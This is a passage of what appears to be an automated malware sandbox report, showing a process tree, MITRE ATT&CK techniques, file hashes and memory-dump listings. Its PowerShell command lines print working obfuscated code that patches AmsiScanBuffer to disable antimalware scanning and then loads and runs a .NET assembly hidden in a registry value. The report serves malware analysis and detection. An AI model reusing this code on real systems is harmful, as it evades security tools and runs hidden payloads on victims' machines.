@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nJMEAcWJfeY=$AAcrQfwqmNutz.GetMethod(''+'G'+''+'e'+''+'t'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+'a'+'n'+'d'+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$JIucMHkApUhUbj=$tkSkKARixqEpPh.Invoke($Null,@([Object]$nJMEAcWJfeY,[Object](''+'L'+''+[Char](111)+''+'a'+''+'d'+''+[Char](76)+''+'i'+''+[Char](98)+'ra'+'r'+''+[Char](121)+''+[Char](65)+'')));$dnZDwSTDbhQwLEnty=$tkSkKARixqEpPh.Invoke($Null,@([Object]$nJMEAcWJfeY,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+'u'+[Char](97)+'l'+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$KbWbHcB=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JIucMHkApUhUbj,$oQGyqEdvFhqngAahMhS).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$rNReMNxGmAnJYAVVF=$tkSkKARixqEpPh.Invoke($Null,@([Object]$KbWbHcB,[Object](''+[Char](65)+''+'m'+''+'s'+''+[Char](105)+''+[Char](83)+'c'+'a'+'nBu'+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$TZGIlbhzsO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dnZDwSTDbhQwLEnty,$ZTbHheZwZOmjdNUBssLTJG).Invoke($rNReMNxGmAnJYAVVF,[uint32]8,4,[ref]$TZGIlbhzsO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$rNReMNxGmAnJYAVVF,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dnZDwSTDbhQwLEnty,$ZTbHheZwZOmjdNUBssLTJG).Invoke($rNReMNxGmAnJYAVVF,[uint32]8,0x20,[ref]$TZGIlbhzsO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+'T'+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+'d'+'i'+[Char](97)+''+[Char](108)+''+[Char](101)+''+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CRkWbIkUkKbL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$eiQYXOCCYMdsHR,[Parameter(Position=1)][Type]$lltKGxfxoL)$WCVpNKUEKkW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+'ga'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+'m'+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+'D'+'e'+'leg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+'An'+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$WCVpNKUEKkW.DefineConstructor('R'+'T'+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+','+'H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$eiQYXOCCYMdsHR).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'ag'+'e'+'d');$WCVpNKUEKkW.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$lltKGxfxoL,$eiQYXOCCYMdsHR).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+'a'+''+[Char](110)+''+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $WCVpNKUEKkW.CreateType();}$VBvBPOQoLQvvr=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+'t'+''+'e'+''+'m'+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+'i'+''+'c'+''+[Char](114)+''+[Char](111)+'s'+'o'+''+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+'2.'+'U'+'n'+[Char](115)+'af'+[Char](101)+''+'V'+''+[Char](66)+''+[Char](118)+''+'B'+''+[Char](80)+'O'+'Q'+'o'+'L'+''+'Q'+''+'v'+'v'+[Char](114)+'');$HydaNaZgSRwlKW=$VBvBPOQoLQvvr.GetMethod(''+'H'+''+'y'+''+[Char](100)+''+[Char](97)+''+[Char](78)+''+[Char](97)+'ZgS'+'R'+''+'w'+''+[Char](108)+''+[Char](75)+''+[Char](87)+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+'bl'+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+'ti'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WDmioRYLxSyyfbgKiLe=CRkWbIkUkKbL @([String])([IntPtr]);$udpdrGwQTmOZGRYnTQaOtr=CRkWbIkUkKbL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ReVkHxejoNc=$VBvBPOQoLQvvr.GetMethod(''+'G'+''+'e'+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+[Char](97)+'n'+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+'l3'+[Char](50)+''+[Char](46)+'dll')));$QFlUCrQUtTfrzy=$HydaNaZgSRwlKW.Invoke($Null,@([Object]$ReVkHxejoNc,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+'b'+'r'+[Char](97)+'r'+[Char](121)+'A')));$MvLQRgcCyRHHPzCGd=$HydaNaZgSRwlKW.Invoke($Null,@([Object]$ReVkHxejoNc,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+'a'+'l'+'Pr'+'o'+'t'+[Char](101)+''+[Char](99)+'t')));$fKjYAFK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QFlUCrQUtTfrzy,$WDmioRYLxSyyfbgKiLe).Invoke('a'+'m'+'s'+[Char](105)+''+[Char](46)+'d'+[Char](108)+'l');$hiekoEOwiGCOnfVNR=$HydaNaZgSRwlKW.Invoke($Null,@([Object]$fKjYAFK,[Object](''+[Char](65)+''+'m'+'s'+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+'e'+''+'r'+'')));$PrbAOahKVZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MvLQRgcCyRHHPzCGd,$udpdrGwQTmOZGRYnTQaOtr).Invoke($hiekoEOwiGCOnfVNR,[uint32]8,4,[ref]$PrbAOahKVZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hiekoEOwiGCOnfVNR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MvLQRgcCyRHHPzCGd,$udpdrGwQTmOZGRYnTQaOtr).Invoke($hiekoEOwiGCOnfVNR,[uint32]8,0x20,[ref]$PrbAOahKVZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](100)+'ial'+'e'+''+[Char](114)+''+'s'+''+[Char](116)+''+'a'+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zqukinxu.izo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/332-222-0x0000019C501D0000-0x0000019C501F7000-memory.dmp

Filesize
156KB

Download
memory/332-226-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/332-227-0x0000019C501D0000-0x0000019C501F7000-memory.dmp

Filesize
156KB

Download
memory/392-235-0x0000023653760000-0x0000023653787000-memory.dmp

Filesize
156KB

Download
memory/392-288-0x0000023653760000-0x0000023653787000-memory.dmp

Filesize
156KB

Download
memory/392-236-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/412-231-0x00000255D0ED0000-0x00000255D0EF7000-memory.dmp

Filesize
156KB

Download
memory/412-232-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/520-160-0x0000021FF2AE0000-0x0000021FF2AF0000-memory.dmp

Filesize
64KB

Download
memory/520-161-0x0000021FF2AE0000-0x0000021FF2AF0000-memory.dmp

Filesize
64KB

Download
memory/520-162-0x0000021FF2AE0000-0x0000021FF2AF0000-memory.dmp

Filesize
64KB

Download
memory/596-217-0x00000240A3280000-0x00000240A32A7000-memory.dmp

Filesize
156KB

Download
memory/596-209-0x00000240A3250000-0x00000240A3271000-memory.dmp

Filesize
132KB

Download
memory/596-212-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/596-211-0x00000240A3280000-0x00000240A32A7000-memory.dmp

Filesize
156KB

Download
memory/624-240-0x0000025768E90000-0x0000025768EB7000-memory.dmp

Filesize
156KB

Download
memory/624-241-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/624-292-0x0000025768E90000-0x0000025768EB7000-memory.dmp

Filesize
156KB

Download
memory/680-220-0x000001E0DCBD0000-0x000001E0DCBF7000-memory.dmp

Filesize
156KB

Download
memory/680-216-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/680-213-0x000001E0DCBD0000-0x000001E0DCBF7000-memory.dmp

Filesize
156KB

Download
memory/956-224-0x000002C1F4BD0000-0x000002C1F4BF7000-memory.dmp

Filesize
156KB

Download
memory/956-225-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/1060-244-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/1060-243-0x0000022E62900000-0x0000022E62927000-memory.dmp

Filesize
156KB

Download
memory/1060-296-0x0000022E62900000-0x0000022E62927000-memory.dmp

Filesize
156KB

Download
memory/1072-248-0x000001AFB35C0000-0x000001AFB35E7000-memory.dmp

Filesize
156KB

Download
memory/1072-249-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/1072-300-0x000001AFB35C0000-0x000001AFB35E7000-memory.dmp

Filesize
156KB

Download
memory/1084-256-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/1084-305-0x000001651D2C0000-0x000001651D2E7000-memory.dmp

Filesize
156KB

Download
memory/1084-253-0x000001651D2C0000-0x000001651D2E7000-memory.dmp

Filesize
156KB

Download
memory/1224-310-0x000002069BA30000-0x000002069BA57000-memory.dmp

Filesize
156KB

Download
memory/1224-259-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/1224-254-0x000002069BA30000-0x000002069BA57000-memory.dmp

Filesize
156KB

Download
memory/1264-257-0x0000018C5CA00000-0x0000018C5CA27000-memory.dmp

Filesize
156KB

Download
memory/1264-261-0x00007FFC4E8B0000-0x00007FFC4E8C0000-memory.dmp

Filesize
64KB

Download
memory/1264-315-0x0000018C5CA00000-0x0000018C5CA27000-memory.dmp

Filesize
156KB

Download
memory/1332-318-0x000001F0B27B0000-0x000001F0B27D7000-memory.dmp

Filesize
156KB

Download
memory/1976-185-0x0000000004670000-0x00000000046D6000-memory.dmp

Filesize
408KB

Download
memory/1976-204-0x0000000004E30000-0x0000000004E4E000-memory.dmp

Filesize
120KB

Download
memory/1976-186-0x00000000046E0000-0x0000000004746000-memory.dmp

Filesize
408KB

Download
memory/1976-180-0x0000000001510000-0x0000000001546000-memory.dmp

Filesize
216KB

Download
memory/1976-181-0x0000000004040000-0x0000000004668000-memory.dmp

Filesize
6.2MB

Download
memory/1976-182-0x0000000001580000-0x0000000001590000-memory.dmp

Filesize
64KB

Download
memory/1976-183-0x0000000001580000-0x0000000001590000-memory.dmp

Filesize
64KB

Download
memory/1976-184-0x0000000003E70000-0x0000000003E92000-memory.dmp

Filesize
136KB

Download
memory/2076-205-0x00007FFC8DAD0000-0x00007FFC8DB8E000-memory.dmp

Filesize
760KB

Download
memory/2076-206-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2076-203-0x00007FFC8E830000-0x00007FFC8EA25000-memory.dmp

Filesize
2.0MB

Download
memory/2076-202-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2076-198-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2552-133-0x00007FF6379D0000-0x00007FF637D91000-memory.dmp

Filesize
3.8MB

Download
memory/2552-166-0x00007FF6379D0000-0x00007FF637D91000-memory.dmp

Filesize
3.8MB

Download
memory/3752-167-0x00007FF7E7BC0000-0x00007FF7E7BE9000-memory.dmp

Filesize
164KB

Download
memory/4648-144-0x000001B9BCEE0000-0x000001B9BCEF0000-memory.dmp

Filesize
64KB

Download
memory/4648-138-0x000001B9BCE10000-0x000001B9BCE32000-memory.dmp

Filesize
136KB

Download
memory/4648-145-0x000001B9BCEE0000-0x000001B9BCEF0000-memory.dmp

Filesize
64KB

Download
memory/4964-179-0x00000290E5DD0000-0x00000290E5DE0000-memory.dmp

Filesize
64KB

Download
memory/4964-196-0x00007FFC8E830000-0x00007FFC8EA25000-memory.dmp

Filesize
2.0MB

Download
memory/4964-197-0x00007FFC8DAD0000-0x00007FFC8DB8E000-memory.dmp

Filesize
760KB

Download
memory/4964-178-0x00000290E5DD0000-0x00000290E5DE0000-memory.dmp

Filesize
64KB

Download
memory/4964-177-0x00000290E5DD0000-0x00000290E5DE0000-memory.dmp

Filesize
64KB

Download